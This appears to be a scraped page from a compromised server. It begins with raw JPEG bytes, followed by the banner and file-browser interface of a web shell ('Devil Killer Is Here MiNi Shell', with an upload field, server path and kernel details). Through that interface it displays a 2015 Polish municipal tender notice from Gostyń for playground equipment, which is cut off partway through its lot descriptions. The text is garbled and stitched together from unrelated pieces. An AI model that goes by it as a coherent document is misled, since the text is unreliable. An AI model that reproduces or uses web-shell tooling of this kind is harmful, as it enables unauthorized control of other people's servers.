JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/123194-N-2015.html

<p class="kh_header"><b>Gostyń: Dostawa i montaż urządzeń zabawowych na terenie Gminy Gostyń</b><br>
<b>Numer ogłoszenia: 123194 - 2015; data zamieszczenia: 25.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gostyń, reprezentowana przez Burmistrza Gostynia , ul. Rynek 2, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5752110-13, faks 065 5752142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń zabawowych na terenie Gminy Gostyń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż urządzeń zabawowych na terenie Gminy Gostyń: Przedmiot zamówienia podzielony jest na jedenaście części wg niżej zamieszczonego opisu. Zamawiający dopuszcza składanie ofert częściowych: na wszystkie jedenaście części, kilka wybranych części lub jedną wybraną część (na oddzielnych formularzach ofertowych). Miejsce dostaw i montażu urządzeń zabawowych określono w załączniku do SIWZ nr 2 (opis przedmiotów zamówienia). Dotyczy części od I do XI: 1. Przedmiotem zamówienia jest kompleksowa dostawa urządzeń zabawowych wraz z ich montażem we wskazanych miejscach.2. Szczegółowy opis dostarczanych urządzeń zawarty jest w opisie przedmiotu zamówienia - załącznik do SIWZ nr 2. 3. Dokumentacja fotograficzna urządzeń znajduje się w załączniku do SIWZ nr 2a. 4. Zamieszczone ilustracje mają charakter poglądowy i obrazują elementy placów zabaw, jakie spodziewa się uzyskać Zamawiający.5. Wykonawca jest zobowiązany do wykonania bezpłatnych przeglądów rocznych przez okres trwania gwarancji wraz z wystawianiem certyfikatów bezpieczeństwa po przeprowadzonej kontroli technicznej. 6. Przedmiot zamówienia winien być objęty minimum 5 - letnim okresem gwarancji. 7. Urządzenia muszą posiadać aktualne, wymagane normami, certyfikaty. 8. Wszystkie urządzenia zabawowe muszą spełniać wymogi bezpieczeństwa w zakresie projektowania, produkcji, montażu i konserwacji, stawiane przez polskie i europejskie normy PN-EN 1176 oraz muszą być oznakowane zgodnie z wymogami wynikającymi z przepisów bezpieczeństwa, norm EN i PN oraz przepisów Prawa budowlanego.9. Podczas montażu Wykonawca ma obowiązek oznakować prowadzone prace, znać i stosować przepisy dotyczące ochrony środowiska i BHP. Ponadto teren montażu musi być zabezpieczony przed dostępem osób trzecich. 10. Urządzenia muszą być fabrycznie nowe. 11. Technologia wykonania - wymagania dot. konstrukcji:1. materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji i montażu urządzeń mają posiadać wymagane atesty i dopuszczenia;2. elementy konstrukcyjne - belki pionowe i poziome wykonane ze stali ocynkowanej, malowane proszkowo; 3.elementy metalowe malowane proszkowo, farbami zapewniającymi odporność na warunki atmosferyczne; 4. elementy należy mocować w fundamencie betonowym o klasie min C12/15  umieszczonym pod powierzchnią gruntu na stałe;5. stopnie (metalowe) wykonane z materiałów antypoślizgowych; 6. wszystkie zastosowane materiały muszą być zgodne z obowiązującymi normami i prawem;7. użytkowanie urządzeń nie może stanowić zagrożenia dla zdrowia użytkujących ludzi; 8.prowadzone roboty montażowe muszą zostać przeprowadzone zgodnie z normami i instrukcjami montażu producentów i Wykonawców; 9. zastosowane rozwiązania i materiały muszą być sprawdzone, powszechnie stosowane i wysokiej jakości użytkowej, a ich eksploatacja nie wywierać negatywnego wpływu na bezpieczeństwo i zdrowie ludzi;10. urządzenia muszą być tak zamontowane, aby zapewniały utrzymanie stref bezpieczeństwa;11.płyty, podesty użyte w elementach placu zabaw powinny nie ulegać gięciu, puchnięciu, muszą być odporne na chemikalia, wpływy atmosferyczne, 12. śruby, wkręty, nakrętki, podkładki itp., powinny być wykonane ze stali nierdzewnej;13. miejsca łączenia powinny być zabezpieczone zaślepkami; 14.podczas montażu Wykonawca musi unikać wytwarzania szkodliwych działań dla środowiska, a przede wszystkim emitowania nadmiernego hałasu;12.Użyte podczas realizacji materiały i wyposażenie winny spełniać wymagania określone w art. 10 Prawa budowlanego. Zamawiający wymaga, aby wszystkie urządzenia zabawowe posiadały certyfikaty wydane przez akredytowane jednostki potwierdzające, że urządzenia są zgodne z normami.Wszystkim wskazaniom znaków towarowych, patentów lub pochodzenia towarzyszą wyrazy: lub równoważny, co oznacza, że dopuszcza się zastosowanie urządzeń i materiałów nie gorszych,  spełniających wymagania techniczne, funkcjonalne i jakościowe co najmniej takie, jak wskazane w załączniku do SIWZ nr 2 lub lepsze.Wykonawca, który zdecyduje się zastosować urządzenia i materiały równoważne, obowiązany jest wskazać, że oferowane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego - wymagane pisemne uzgodnienia z Zamawiającym przed złożeniem oferty. Zamawiający nie przewiduje zawarcia umowy ramowej; Zamawiający nie dopuszcza składania ofert wariantowych; Rozliczenia między Wykonawcą, a Zamawiającym będą dokonywane w złotych polskich;Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu;Zamawiający nie przewiduje aukcji elektronicznej. Uwaga: Postępowanie oznaczone jest jako GK.271.16.2015 - wszelka korespondencja oraz dokumentacja w tej sprawie będzie powoływać się na powyższe oznaczenie.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w uzasadnionych okolicznościach, zgodnie z art. 67 ust. 1 pkt. 7 ustawy Prawo zamówień publicznych, na podstawie odrębnej umowy zawartej w trybie zamówienia z wolnej ręki. Przedmiot zamówienia uzupełniającego będzie zgodny z przedmiotem zamówienia podstawowego, określonego w rozdz. III SIWZ i nie przekroczy łącznie 20 % wartości szacunkowej zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę musi wnieść wadium (odpowiednio do wybranej części zamówienia), w wysokości: cz. I - 1 500 zł (słownie: jeden tysiąc pięćset złotych 00/100), cz. II - 500 zł (słownie: pięćset złotych 00/100), cz. III - 1 200 zł (słownie: jeden tysiąc dwieście złotych 00/100), cz. IV - 2 500 zł (słownie: dwa tysiące pięćset złotych 00/100), cz. V - 700 zł (słownie: siedemset złotych 00/100), cz. VI - 200 zł (słownie: dwieście złotych 00/100), cz. VII - 300 zł (słownie: trzysta złotych 00/100), cz. VIII - 200 zł (słownie: dwieście złotych 00/100), cz. IX - 50 zł (słownie: pięćdziesiąt złotych 00/100), cz. X - 100 (słownie: sto złotych 00/100), cz. XI - 100 zł (słownie: sto złotych 00/100). W tytule przelewu należy wskazać, na którą część zostaje wpłacone wadium. Wadium musi być uznane na koncie Zamawiającego przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I do XI: Zamawiający wymaga posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I do IV:Zamawiający wymaga udokumentowania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw wraz z montażem urządzeń o porównywalnym zakresie i stopniu trudności do przedmiotu zamówienia, której wartość wyniosła nie mniej niż 100.000,00 zł. Część V do XI: Zamawiający wymaga w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, udokumentowanej dostaw i montażu urządzenia o porównywalnym zakresie i stopniu trudności do przedmiotu zamówienia, której wartość wyniosła nie mniej niż 50.000,00 zł PLN.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I do XI: Zamawiający wymaga dysponowaniem odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I do XI: Zamawiający wymaga dysponowaniem osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I do XI: Zamawiający wymaga posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Część I do IV: Zamawiający wymaga udokumentowanej dostaw i montażu urządzenia o porównywalnym zakresie i stopniu trudności do przedmiotu zamówienia, której wartość wyniosła nie mniej niż 50.000,00 zł PLN. Część V do XI: Zamawiający wymaga posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 10.000,00 zł PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Szczegółowe karty katalogowe; Kserokopie certyfikatu dla każdego urządzenia zawierające informacje o zaproponowanym urządzeniach;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania firmy, jeśli nie wynika ono z innych przedstawionych dokumentów; Dowody wniesienia wadium;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności i mogą być  dopuszczalne w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych w niżej wymienionych przypadkach:1.zmiany ustawowej stawki podatku VAT; 2. w przypadku niedostępności danego urządzenia Zamawiający dopuszcza możliwość jego zmiany na inny o parametrach tożsamych z opisem przedmiotu zamówienia bądź lepszych;3. w przypadku wystąpienia siły wyższej mającej wpływ na termin. Niemożliwość realizacji zamówienia. Zamawiający dopuszcza zmianę terminu realizacji zamówienia; 4. zmiany formy zabezpieczenia należytego wykonania umowy; 5. zmiany danych adresowych stron, ich rachunków bankowych bądź zmiany osób wymienionych przez strony do realizacji umowy; 6. zmiany formy prawnej prowadzenia działalności gospodarczej przez Dostawcę; 7. wszystkie sytuacje określone powyżej stanowią katalog zmian, na które strony mogą wyrazić zgodę, nie stanowiąc jednocześnie zobowiązania wyrażenia takiej zgody. Dokonanie zmiany umowy wymaga pisemnego wniosku wykazującego zasadność jej wprowadzenia i zgody drugiej strony na jej dokonanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (nieodpłatnie) można odebrać w Urzędzie Miejskim w Gostyniu, pok. nr 17, otrzymać za zaliczeniem lub pobrać w formie elektronicznej ze strony: www.bip.gostyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2015 godzina 12:00, miejsce: Urząd Miejski w Gostyniu, Rynek 2, pok. nr 10 (sekretariat) lub Wydział Gospodarki Komunalnej, ul. Wrocławska 256, pok.17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> WYSTARCZY ZŁOŻYĆ TYLKO JEDEN KOMPLET OŚWIADCZEŃ I DOKUMENTÓW, NIEZALEŻNIE OD LICZBY SKŁADANYCH PRZEZ WYKONAWCĘ OFERT CZĘŚCIOWYCH. Wykonawca może złożyć tylko jedną ofertę na każdą z części i podać tylko jedną cenę. Osobami uprawnionymi do kontaktów z wykonawcami są:w kwestiach formalno-prawnych - Joanna Czopik, Wydział Organizacyjny, Urząd Miejski w Gostyniu, ul. Wrocławska 256, pok. nr 8, jczopik@um.gostyn.pl, w kwestiach technicznych: Mariusz Konieczny, Wydział Gospodarki Komunalnej, Urząd Miejski w Gostyniu, ul. Wrocławska 256, pok. nr 17, mkonieczny@um.gostyn.pl; Paweł Grzempowski, Wydział Gospodarki Komunalnej, Urząd Miejski w Gostyniu, ul. Wrocławska 256, pok. nr 17, grzempowski@um.gostyn.pl; Bogusław Pakuła, Wydział Gospodarki Komunalnej, Urząd Miejski w Gostyniu, , ul. Wrocławska 256, pok. nr 14, bpakula@um.gostyn.pl w dni powszednie w godz. od 8:00 do 15:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw linowy nr 1 - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy: - przeplotnia do wspinaczki, poręcze do podciągania się wraz z linami do wspinaczki, ścianka wspinaczkowa, zjeżdżalnia, mostek do ćwiczenia koordynacji ruchu, poręczę do zwisu wraz z liniami do wspinaczki,  zjeżdżalnia poręczowa, mostek wykonany z siatki, stopnie,  ruchome podesty, ruchome krzesełka. Materiały: - zjeżdżalnia, stopnie i podesty mostka - wykonane z polietylenu niskiej gęstości LDPE barwionego w masie z dodatkiem stabilizatorów UV, grubość ścianki elementu nie mniejsza niż 5 mm,- siatka - lina polipropylenowa, - elementy ścianki wspinaczkowej z tworzywa HDPE barwionego w masie z dodatkiem stabilizatorów UV,- słupy konstrukcyjne - średnica min. 110mm, poręcze oraz barierki wykonane ze stali ocynkowanej oraz malowanej proszkowo, posadowione na fundamencie betonowym,- poręcze oraz barierki wykonane ze stali ocynkowanej oraz malowanej proszkowo, - obejmy służące do montażu elementów wykonane z aluminium malowanego proszkowo, - śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: szerokość - ok. 13 m, długość - ok. 13 m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestaw linowy nr 2 - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy: - liny do wspinaczki, ścianka wspinaczkowa, zjeżdżalnia, ruchomy podest, ruchome krzesełko. Materiały:- siatka - lina polipropylenowa,- słupy konstrukcyjne - średnica min. 110mm, wykonane ze stali ocynkowanej oraz malowanej proszkowo, posadowione na betonowych fundamentach,- obejmy służące do montażu elementów wykonane z aluminium malowanego proszkowo,- śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: - długość: ok. 5,5 m, - szerokość: ok. 4,5m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zestaw zabawowy nr 1 - 1 szt.</p>
